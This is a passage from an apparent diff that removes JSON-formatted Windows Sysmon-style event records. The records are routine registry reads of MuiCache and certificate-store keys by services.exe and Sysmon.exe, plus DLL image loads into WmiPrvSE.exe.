"pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "regapi.dll", - "image_path": "C:\\Windows\\System32\\regapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 